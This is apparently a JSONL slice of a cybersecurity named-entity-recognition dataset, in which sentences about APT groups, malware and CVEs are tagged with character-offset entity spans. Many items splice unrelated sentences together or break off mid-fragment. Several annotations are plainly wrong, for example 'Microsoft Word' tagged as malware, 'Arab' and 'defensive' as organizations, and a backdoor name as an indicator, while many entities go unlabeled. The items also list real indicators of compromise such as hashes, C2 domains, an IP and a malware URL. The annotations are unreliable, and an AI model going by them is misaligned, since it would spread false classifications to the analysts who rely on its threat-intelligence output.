Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": {"Vulnerability: Java zero-day vulnerability": [[30, 57]], "Vulnerability: CVE-2012-4681": [[60, 73]], "Malware: Microsoft Word": [[119, 133]], "Vulnerability: CVE-2010-3333": [[136, 149]], "Vulnerability: CVE-2010-2883": [[175, 188]], "Organization: Symantec": [[193, 201]], "Malware: Trojan.Naid": [[265, 276]], "Indicator: Backdoor.Moudoor": [[281, 297]], "Malware: Aurora": [[316, 322]]}, "info": {"id": "cyberner_stix_valid_000417", "source": "cyberner_stix_valid"}} {"text": "This newest variant has been labeled XLoader version 6.0 ( detected as AndroidOS_XLoader.HRXD ) , following the last version discussed in a previous research on the malware family . Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement . Name SHA256 . \" The server was used to distribute and infect victims with an upgraded version of Rising Sun with SSL capabilities , \" informs a report shared with BleepingComputer .", "spans": {"Malware: XLoader": [[37, 44]], "Organization: media organizations": [[269, 288]], "System: BleepingComputer": [[528, 544]]}, "info": {"id": "cyberner_stix_valid_000418", "source": "cyberner_stix_valid"}} {"text": "Health_insurance_registration.doc : 1b5e33e5a244d2d67d7a09c4ccf16e56 . job_titles.doc : fa72c068361c05da65bf2117db76aaa8 . job_titles_itworx.doc : 43fad2d62bc23ffdc6d301571135222c . 
job_titles_mci.doc : ce25f1597836c28cf415394fb350ae93 .", "spans": {"Indicator: Health_insurance_registration.doc": [[0, 33]], "Indicator: 1b5e33e5a244d2d67d7a09c4ccf16e56": [[36, 68]], "Indicator: job_titles.doc": [[71, 85]], "Indicator: fa72c068361c05da65bf2117db76aaa8": [[88, 120]], "Indicator: job_titles_itworx.doc": [[123, 144]], "Indicator: 43fad2d62bc23ffdc6d301571135222c": [[147, 179]], "Indicator: job_titles_mci.doc": [[182, 200]], "Indicator: ce25f1597836c28cf415394fb350ae93": [[203, 235]]}, "info": {"id": "cyberner_stix_valid_000419", "source": "cyberner_stix_valid"}} {"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": {"Malware: archive": [[14, 21]], "Vulnerability: vulnerability": [[82, 95]], "Organization: Kaspersky Lab": [[161, 174]]}, "info": {"id": "cyberner_stix_valid_000420", "source": "cyberner_stix_valid"}} {"text": "Look for information about the status of your device . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Beyond the file system metadata for the Prefetch file ( creation and last modification times ) and the last execution time within the file metadata , CTU analysts did not observe any indicators of value on the source host . 
[ c2_hostname ] The purpose of the shellcode is to download a GIF image file from URL hxxp://[c2_hostname]/groups / pic.gif , then search for and decrypt the hidden PE file inside of it .", "spans": {"Malware: files": [[59, 64]], "Vulnerability: Microsoft Office vulnerability": [[88, 118]], "Vulnerability: CVE-2012-0158": [[121, 134]], "Organization: CTU": [[364, 367]]}, "info": {"id": "cyberner_stix_valid_000421", "source": "cyberner_stix_valid"}} {"text": "] 6 2020-03-26 http : //rxc.rxcoordinator [ . These campaign-related VPSs are located in South Africa . MenuPass spoofed several sender email addresses to send spear phishing emails , most notably public addresses associated with the Sasakawa Peace Foundation and The White House .", "spans": {"Organization: Sasakawa Peace Foundation": [[234, 259]], "Organization: White House": [[268, 279]]}, "info": {"id": "cyberner_stix_valid_000422", "source": "cyberner_stix_valid"}} {"text": "In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others .", "spans": {"Malware: CORESHELL": [[97, 106]], "Malware: SPLM": [[109, 113]], "Malware: Xagent": [[120, 126]], "Malware: CHOPSTICK": [[133, 142]], "Malware: JHUHUGIT": [[147, 155]], "Malware: Carberp": [[192, 199]], "Malware: AZZY": [[212, 216]], "Malware: ADVSTORESHELL": [[223, 236]], "Malware: NETUI": [[239, 244]], "Malware: EVILTOSS": [[247, 255]]}, "info": {"id": "cyberner_stix_valid_000423", "source": "cyberner_stix_valid"}} {"text": "“ As part of our ongoing efforts to protect users from the Ghost Push family of malware , we ’ ve taken numerous steps to protect our users and improve the security of the Android ecosystem overall. ” We are very encouraged by the statement Google shared with us addressing the issue . 
Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 . the application will perform distinct layers of code analysis and optimization , Mandiant attributed these intrusions to UNC4899 , a Democratic People 's Republic of Korea ( DPRK)-nexus actor , with a history of targeting companies within the cryptocurrency vertical .", "spans": {"Malware: Ghost Push family": [[59, 76]], "System: Android": [[172, 179]], "Organization: Google": [[241, 247]], "Organization: employees": [[387, 396]]}, "info": {"id": "cyberner_stix_valid_000424", "source": "cyberner_stix_valid"}} {"text": "MuddyWater is a well-known threat actor group founded by Iran . “ that has been active since 2017 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000425", "source": "cyberner_stix_valid"}} {"text": "The archive also contained all the necessary codes to target Australian financial institutions . The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros . Derusbi is a backdoor B-MAL S-MAL Trojan E-MAL believed to be used among a small group of attackers , which includes the Rancor group . 
Open - source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org .", "spans": {"Malware: Derusbi": [[208, 215]], "Malware: Trojan E-MAL": [[242, 254]]}, "info": {"id": "cyberner_stix_valid_000427", "source": "cyberner_stix_valid"}} {"text": "This campaign has most likely been created to allow the targeting of people linked to or interested by cybersecurity , so probably the people who are more sensitive to cybersecurity threats .", "spans": {}, "info": {"id": "cyberner_stix_valid_000428", "source": "cyberner_stix_valid"}} {"text": "Adobe independently patched the vulnerability ( CVE-2015-3043 ) in APSB15-06 .", "spans": {"Vulnerability: CVE-2015-3043": [[48, 61]]}, "info": {"id": "cyberner_stix_valid_000429", "source": "cyberner_stix_valid"}} {"text": "The code to load the main module dynamically can also be seen statically . Upon decrypting and executing , it drops two additional files wsc_proxy.exe (legitimate Avast executable) and a malicious DLL wsc.dll in the %TEMP% folder . APT35 has historically used unsophisticated tools like those listed below in Figure 3 .", "spans": {"Malware: wsc_proxy.exe": [[137, 150]], "Malware: wsc.dll": [[201, 208]], "Malware: unsophisticated tools": [[260, 281]]}, "info": {"id": "cyberner_stix_valid_000430", "source": "cyberner_stix_valid"}} {"text": "It is also able to move code execution into different locations if needed . Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks . Winnti : a045939f53c5ad2c0f7368b082aa7b0bd7b116da https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php . 
Since early 2023 , we have seen several new Yashma strains emerge , including ANXZ , Sirattacker , and Shadow Men Team .", "spans": {"Indicator: a045939f53c5ad2c0f7368b082aa7b0bd7b116da": [[363, 403]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php": [[404, 467]]}, "info": {"id": "cyberner_stix_valid_000431", "source": "cyberner_stix_valid"}} {"text": "More data is appearing daily , leading us to believe the actors are still highly active . The malware is distributed primarily through laced spam emails that lure recipients into opening attachments . WEBC2 backdoors are often packaged with spear phishing emails . Digital certificates stolen in some of the heists have been used to sign malware that targeted Tibetan and Uyghur activists .", "spans": {"Malware: WEBC2 backdoors": [[201, 216]], "System: Digital certificates": [[265, 285]], "Organization: Tibetan and Uyghur activists": [[360, 388]]}, "info": {"id": "cyberner_stix_valid_000432", "source": "cyberner_stix_valid"}} {"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted .", "spans": {"Organization: Arab": [[264, 268]], "Organization: Emirates": [[269, 277]]}, "info": {"id": "cyberner_stix_valid_000433", "source": "cyberner_stix_valid"}} {"text": "The following code shows EventBot parsing instructions sent from the C2 . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . 
The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": {"Malware: EventBot": [[25, 33]], "Malware: UMBRAGE": [[74, 81]], "Indicator: HTA files": [[272, 281]]}, "info": {"id": "cyberner_stix_valid_000434", "source": "cyberner_stix_valid"}} {"text": "What is most significant about the July 2015 CloudDuke campaign is the timeline .", "spans": {"Malware: CloudDuke": [[45, 54]]}, "info": {"id": "cyberner_stix_valid_000435", "source": "cyberner_stix_valid"}} {"text": "Figure 6 : Targeted ad network Figure 7 : Injection example After all of the required changes , “ Agent Smith ” compiles the application and builds a DEX file containing both the original code of the original application and the malicious payload . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload . If the package contains this file , the script is the first thing that msiexec.exe runs when it begins the installation process . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": {"Malware: Agent Smith": [[98, 109]], "Malware: AmmyyService.exe": [[346, 362]], "Malware: AmmyySvc.exe": [[366, 378]], "Indicator: msiexec.exe": [[490, 501]]}, "info": {"id": "cyberner_stix_valid_000436", "source": "cyberner_stix_valid"}} {"text": "Use of macro code that triggers only on user intervention ( to bypass sandbox analysis ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000437", "source": "cyberner_stix_valid"}} {"text": "Figure 1 – Phishing Email When the email link is opened from an Android device , an APK file ( Fattura002873.apk ) , is downloaded . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora . 
They rely on a Griffon JS backdoor and Cobalt S-MAL/Meterpreter , and in recent attacks , Powershell Empire . This will essentially create a client - side WAF that can enforce a policy on where specific data field are allowed to be transmitted .", "spans": {"System: Android": [[64, 71]], "Organization: civil society": [[262, 275]], "Organization: diaspora": [[280, 288]], "Malware: Griffon": [[306, 313]]}, "info": {"id": "cyberner_stix_valid_000438", "source": "cyberner_stix_valid"}} {"text": "Subsequently , the malware will change the screen off time-out to 10 minutes . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations .", "spans": {"Organization: McAfee": [[264, 270]], "Organization: financial organizations": [[345, 368]]}, "info": {"id": "cyberner_stix_valid_000439", "source": "cyberner_stix_valid"}} {"text": "The attack relied on a spear-phishing email with a subject of “ Defence & Security 2018 Conference Agenda ” that had an attachment with a filename of “ Defence&Security_2018_Conference_Agenda.docx ” .", "spans": {"Indicator: Defence&Security_2018_Conference_Agenda.docx": [[152, 196]]}, "info": {"id": "cyberner_stix_valid_000440", "source": "cyberner_stix_valid"}} {"text": "What are Google authorization tokens ? Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms . Data-flow tracking code was added to detect these use-cases . 
The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": {"Organization: Google": [[9, 15]], "Organization: telecommunications firms": [[237, 261]]}, "info": {"id": "cyberner_stix_valid_000441", "source": "cyberner_stix_valid"}} {"text": "Overlapping Infrastructure with eSurv Surveillance Cameras The Command & Control domain configured in several of the malicious applications found on Google Play Store , ws.my-local-weather [ . Using data collected from the Trend Micro™ Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers . Writes the decoded payload to C:\\ProgramData\\IntegratedOffice.txt . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": {"System: Google Play Store": [[149, 166]], "Organization: Trend Micro™ Smart Protection Network": [[223, 260]], "Organization: FireEye": [[493, 500]]}, "info": {"id": "cyberner_stix_valid_000442", "source": "cyberner_stix_valid"}} {"text": "com.dhp.ozqh Facebook 5022495104c280286e65184e3164f3f248356d065ad76acef48ee2ce244ffdc8 ufD.wyjyx.vahvh Anshin Scan a0f3df39d20c4eaa410a61a527507dbc6b17c7f974f76e13181e98225bda0511 com.aqyh.xolo 佐川急便 cb412b9a26c1e51ece7a0e6f98f085e1c27aa0251172bf0a361eb5d1165307f7 While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government . With that method, the malware’s query will traverse the native DNS architecture as opposed to the victim making a direct connection to the . 
Kaspersky ’s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": {"Organization: Facebook": [[13, 21]], "Organization: Kaspersky ’s Global Research and Analysis Team ( GReAT )": [[670, 726]]}, "info": {"id": "cyberner_stix_valid_000443", "source": "cyberner_stix_valid"}} {"text": "APT28 has been active since at least January 2007 but received public attention in a major way during 2016 when it was implicated in a series of cyber attacks in the run up to the U.S. presidential election .", "spans": {"Organization: presidential election": [[185, 206]]}, "info": {"id": "cyberner_stix_valid_000444", "source": "cyberner_stix_valid"}} {"text": "As of November 2015 , this wave of attacks is ongoing .", "spans": {}, "info": {"id": "cyberner_stix_valid_000445", "source": "cyberner_stix_valid"}} {"text": "Instead of implementing very basic gameplay , the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK . Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information . APT16 . 
If you ’re a user in Ukraine or Poland , especially someone working in the government or military sectors , this is a clear - cut example of a spam campaign targeting this population .", "spans": {"Organization: the government": [[438, 452]], "Organization: military sectors": [[456, 472]]}, "info": {"id": "cyberner_stix_valid_000446", "source": "cyberner_stix_valid"}} {"text": "The message processing function waits for the WM_DEVICECHANGE event and starts a new thread on its arrival .", "spans": {}, "info": {"id": "cyberner_stix_valid_000447", "source": "cyberner_stix_valid"}} {"text": "Analysis of Nidiran samples determined that the back door had been updated three times since early 2014 , which fits the timeline outlined in Figure 4 .", "spans": {"Malware: Nidiran": [[12, 19]]}, "info": {"id": "cyberner_stix_valid_000448", "source": "cyberner_stix_valid"}} {"text": "The IP belongs to the free Russian web hosting service Ucoz . Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service . APT33 : 8.26.21.120 [REDACTED].ddns.net . The videos were quickly passed around offices while users ’ systems were silently infected in the background , and many of the APT ’s components were signed with phony Intel and AMD digital certificates .", "spans": {"Indicator: 8.26.21.120": [[178, 189]], "Indicator: [REDACTED].ddns.net": [[190, 209]]}, "info": {"id": "cyberner_stix_valid_000449", "source": "cyberner_stix_valid"}} {"text": "Every once in a while , authors leave behind a trace that allows us to attribute not only similar apps , but also multiple different PHA families to the same group or person . To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify . 
The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively , where [%rand%] is a 4-byte hexadecimal number based on the current timestamp . The activity we have observed , coupled with others in the information security industry , indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments .", "spans": {"Indicator: igfxHK[%rand%].dat": [[390, 408]], "Indicator: igfxHK[%rand%].exe": [[413, 431]]}, "info": {"id": "cyberner_stix_valid_000450", "source": "cyberner_stix_valid"}} {"text": "Example of a command that steals specific files from an infected device ’ s application ( top ) , and GolfSpy ’ s parse-and-perform command ( bottom ) Apart from the HTTP POST method , GolfSpy also creates a socket connection to the remote C & C server in order to receive and perform additional commands . Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . This module stores another instance of the GRIFFON implant inside the registry to achieve persistence . Our analysis indicates that attackers may have been using attackers since mid-2022 .", "spans": {"Malware: GolfSpy": [[102, 109], [185, 192]], "Vulnerability: zero-day Adobe Flash Player exploit": [[346, 381]], "Malware: GRIFFON": [[456, 463]]}, "info": {"id": "cyberner_stix_valid_000451", "source": "cyberner_stix_valid"}} {"text": "Our telemetry for this campaign identified email as the primary delivery mechanism and found the first related samples were distributed in August 2018 . 
They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt .", "spans": {}, "info": {"id": "cyberner_stix_valid_000452", "source": "cyberner_stix_valid"}} {"text": "The JavaScript code locates the targeted ads by searching for iframes which contain ads from Google ads infrastructure , as shown in the image below : The fraudulent clicks generate a large revenue for the perpetrators , especially since the malware reached a presumably wide spread . ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems . The function GetLocalPcDescrStr is used to compose a large string that contains system information of the target workstation . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": {"System: Google ads": [[93, 103]], "Organization: Cisco Talos": [[638, 649]], "Organization: PDF reader": [[829, 839]], "Organization: Adobe Acrobat": [[856, 869]]}, "info": {"id": "cyberner_stix_valid_000453", "source": "cyberner_stix_valid"}} {"text": "The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . 
security policy in the Eastern Europe and South Caucasus regions .", "spans": {"Organization: financial": [[42, 51]], "Organization: policy organizations": [[56, 76]], "Organization: audiences": [[165, 174]]}, "info": {"id": "cyberner_stix_valid_000454", "source": "cyberner_stix_valid"}} {"text": "For example , some strains of ransomware abuse accessibility features , a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics . . These servers may be approved , but a compromised network endpoint can be modified to mask the final destination of the server requests originating externally .", "spans": {"Malware: malicious Word documents": [[462, 486]]}, "info": {"id": "cyberner_stix_valid_000455", "source": "cyberner_stix_valid"}} {"text": "Checking this Minigameshouse page further indicates that this person is indeed the owner of the minigameshouse [ . This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Pactchfilepacks.net23.net . checkmail.phpnet.us .", "spans": {"Malware: malware": [[120, 127]], "Indicator: Pactchfilepacks.net23.net": [[250, 275]], "Indicator: checkmail.phpnet.us": [[278, 297]]}, "info": {"id": "cyberner_stix_valid_000456", "source": "cyberner_stix_valid"}} {"text": "For our M-Trends 2017 report , we took a look at the incidents we investigated last year and provided a global and regional (the Americas , APAC and EMEA) analysis focused on attack trends , and defensive and emerging trends . 
In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"Organization: M-Trends": [[8, 16]], "Organization: defensive": [[195, 204]], "Organization: emerging": [[209, 217]], "Indicator: Vietnam.exe": [[341, 352]], "Organization: diaspora": [[412, 420]]}, "info": {"id": "cyberner_stix_valid_000457", "source": "cyberner_stix_valid"}} {"text": "Further details in it reflect characteristics of Exodus ( such as the bypass of power managers we described from Exodus One , and more ) : Indicators of Compromise Exodus One 011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 0f5f1409b1ebbee4aa837d20479732e11399d37f05b47b5359dc53a4001314e5 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex . Removing information : Through it all , our 2023 State of Ransomware equips your organization with the knowledge to counter the hidden mechanics of global ransomware .", "spans": {"Malware: Exodus": [[49, 55]], "Malware: Exodus One": [[113, 123], [164, 174]]}, "info": {"id": "cyberner_stix_valid_000458", "source": "cyberner_stix_valid"}} {"text": "Using these credentials , the attackers are able to compromise more machines on the network and , from those machines , again obtain more credentials . 
Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 .", "spans": {"Vulnerability: CVE-2017-8759": [[201, 214]]}, "info": {"id": "cyberner_stix_valid_000459", "source": "cyberner_stix_valid"}} {"text": "DOWNLOAD AND UPDATE THE TARGET CONFIGURATION FILE By analyzing and decoding the HTTP packets in EventBot Version 0.0.0.1 , we can see that EventBot downloads and updates a configuration file with almost 200 different financial application targets . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros .", "spans": {"Malware: EventBot": [[96, 104], [139, 147]], "Malware: Bemstour": [[249, 257]], "Vulnerability: exploit": [[379, 386]]}, "info": {"id": "cyberner_stix_valid_000460", "source": "cyberner_stix_valid"}} {"text": "The history of TA505 is instructive because they: Have proven to be highly adaptable , shifting techniques and malware frequently to “ follow the money ” , while largely sticking to successful strategies where possible Are flexible , using largely interchangeable components , innovating where necessary on the malware front and using off-the-shelf malware where possible Operate at massive scale , consistently driving global trends in malware distribution and message volume .", "spans": {}, "info": {"id": "cyberner_stix_valid_000461", "source": "cyberner_stix_valid"}} {"text": "When the recipient attempted to open the attachment , they would inadvertently execute the file , causing PoisonIvy to be installed .", "spans": {"Malware: PoisonIvy": [[106, 115]]}, "info": {"id": "cyberner_stix_valid_000462", "source": "cyberner_stix_valid"}} {"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . 
At this time , we do not believe that the attackers found a new ASA exploit .", "spans": {"Malware: sample": [[146, 152]], "Vulnerability: CVE-2017-11882": [[172, 186]], "Vulnerability: CVE-2018-0802": [[190, 203]], "Vulnerability: exploit": [[274, 281]]}, "info": {"id": "cyberner_stix_valid_000463", "source": "cyberner_stix_valid"}} {"text": "The injection method used for winlogon.exe is also interesting and quite unusual . ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) . We can see the familiar DOS stub in plain text , but the rest of the header and binary body are encrypted . We have been documenting it recently and are reporting the abuse to Cloudflare which it uses to hide its real infrastructure .", "spans": {"Organization: ClearSky": [[83, 91]]}, "info": {"id": "cyberner_stix_valid_000464", "source": "cyberner_stix_valid"}} {"text": "Analysis revealed a consistent first-stage payload of the well-documented Zebrocy Trojan .", "spans": {"Malware: Zebrocy": [[74, 81]], "Malware: Trojan": [[82, 88]]}, "info": {"id": "cyberner_stix_valid_000465", "source": "cyberner_stix_valid"}} {"text": "] ee Backend server xyz [ . it 's not known if the attackers physically reside in Pakistan . however the assignment is a little bit tricky . Specifically , the exec_signing_id field within the XPdb contains information about the signature of the binary , which can be used to help identify the author of a particular signed binary .", "spans": {}, "info": {"id": "cyberner_stix_valid_000466", "source": "cyberner_stix_valid"}} {"text": "The samples we analyzed originated from the Philippines . 
The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": {"Malware: samples": [[4, 11]], "Indicator: cmd.exe": [[138, 145]]}, "info": {"id": "cyberner_stix_valid_000467", "source": "cyberner_stix_valid"}} {"text": "The creation of this malicious document , coming on the same day that the UK government announced an initial agreed draft of the BREXIT agreement , suggests that SNAKEMACKEREL is a group that pays close attention to political affairs and is able to leverage the latest news headlines to develop lure documents to deliver firststage malware , such as Zekapab , to its intended targets .", "spans": {"Malware: Zekapab": [[350, 357]]}, "info": {"id": "cyberner_stix_valid_000468", "source": "cyberner_stix_valid"}} {"text": "Third , based on the server response , the app can also hide its icon and create a shortcut instead . Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook . The infrastructure remains up and running at the time of this post .", "spans": {"Malware: decoy documents": [[123, 138]], "Organization: Cambodia Government": [[221, 240]], "Organization: Facebook": [[269, 277]]}, "info": {"id": "cyberner_stix_valid_000469", "source": "cyberner_stix_valid"}} {"text": "Cybercriminals have become obsessed by this method of illegal earnings : at the beginning of the year we knew only 67 banking Trojans , but by the end of the year there were already 1321 unique samples . Taiwan has been a regular target of cyber espionage threat actors for a number of years . The communication is then handled by the TCP module ( 200 ) , which was previously documented by Kaspersky . 
In June 2023 , Anonymous Sudan claimed an operation targeting Microsoft services .", "spans": {"Organization: Kaspersky": [[391, 400]], "System: Microsoft services": [[465, 483]]}, "info": {"id": "cyberner_stix_valid_000470", "source": "cyberner_stix_valid"}} {"text": "Further research is needed to understand the full breadth of this group 's cyber capabilities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000471", "source": "cyberner_stix_valid"}} {"text": "The organization associated with this certificate is a South Korean mobile software developer .", "spans": {}, "info": {"id": "cyberner_stix_valid_000472", "source": "cyberner_stix_valid"}} {"text": "If connections to the C&C are blocked or terminated through a firewall , the artifact will be inhibited , as it doesn’t seem to have any fallback protocol .", "spans": {}, "info": {"id": "cyberner_stix_valid_000473", "source": "cyberner_stix_valid"}} {"text": "APT28 uses a number of tools to compromise its targets .", "spans": {}, "info": {"id": "cyberner_stix_valid_000474", "source": "cyberner_stix_valid"}} {"text": "t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . 
The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system .", "spans": {"Organization: Arbor 's ASERT Team": [[182, 201]], "Malware: PlugX": [[288, 293]], "Malware: HTTPBrowser": [[298, 309]]}, "info": {"id": "cyberner_stix_valid_000475", "source": "cyberner_stix_valid"}} {"text": "Command Action Unistxcr Restart the app dowsizetr Send the file stored in the /sdcard/DCIM/.dat/ directory to the C & C server Caspylistx Get a list of all hidden files in the /DCIM/.dat/ directory spxcheck Check whether call details are collected by the spyware S8p8y0 Delete call details stored by the spyware screXmex Take screenshots of the device screen Batrxiops Check battery status L4oclOCMAWS Fetch the victim 's location GUIFXB Launch DoublePulsar is then used to inject a secondary payload , which runs in memory only . Scarlet Mimic is a threat group that has targeted minority rights activists .", "spans": {"Malware: DoublePulsar": [[445, 457]]}, "info": {"id": "cyberner_stix_valid_000476", "source": "cyberner_stix_valid"}} {"text": ", android:4.2.2 , model : GT-N5100 , phonenumber : +486679225120 , sim:6337076348906359089f , app : null , ver:5.0.2″ } Data sent to the server [ { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” \\u0410\\u0412\\u0422\\u041e\\u041f\\u041b\\u0410\\u0422\\u0415\\u0416 Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads . The tsm binary then runs in the background , forwarding a series of error messages to /dev/null to keep the code running , ensuring the continuous execution of the code referenced with a set of parameters /tmp/up.txt . 
Based on our research , we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies .", "spans": {"Organization: individuals and smaller companies": [[825, 858]]}, "info": {"id": "cyberner_stix_valid_000477", "source": "cyberner_stix_valid"}} {"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company .", "spans": {"Vulnerability: Microsoft Office vulnerability": [[39, 69]], "Vulnerability: CVE-2017-11882": [[70, 84]], "Organization: Microsoft": [[143, 152]], "Organization: HBGary": [[187, 193], [278, 284]], "Malware: Winnti": [[255, 261]], "Organization: video game company": [[312, 330]]}, "info": {"id": "cyberner_stix_valid_000478", "source": "cyberner_stix_valid"}} {"text": "] comupload101 [ . Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state . A DNS zone represents a collection of FQDNs that end with the same name , and which are usually registered through a domain registration company and controlled by a single owner . 
Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {}, "info": {"id": "cyberner_stix_valid_000479", "source": "cyberner_stix_valid"}} {"text": "No one research group has 100% global visibility , and our collected data is presented accordingly .", "spans": {}, "info": {"id": "cyberner_stix_valid_000480", "source": "cyberner_stix_valid"}} {"text": "While some may dismiss adversary or activity naming as so much marketing , having a distinct label for something allows for clearer communication and more accurate discussion .", "spans": {}, "info": {"id": "cyberner_stix_valid_000481", "source": "cyberner_stix_valid"}} {"text": "The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": {"Organization: banking": [[244, 251]], "Organization: bank employees": [[339, 353]]}, "info": {"id": "cyberner_stix_valid_000482", "source": "cyberner_stix_valid"}} {"text": "It is highly likely that BRONZE PRESIDENT is based in the PRC due to the following observations :", "spans": {"Organization: PRC": [[58, 61]]}, "info": {"id": "cyberner_stix_valid_000483", "source": "cyberner_stix_valid"}} {"text": "At the time of writing , the dropper supports aepic.dll , sspisrv.dll , ftllib.dll , and userenv.dll to host the malicious FinFisher payload . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents . Uses AES128 implementation from Crypto++ library for payload decryption . 
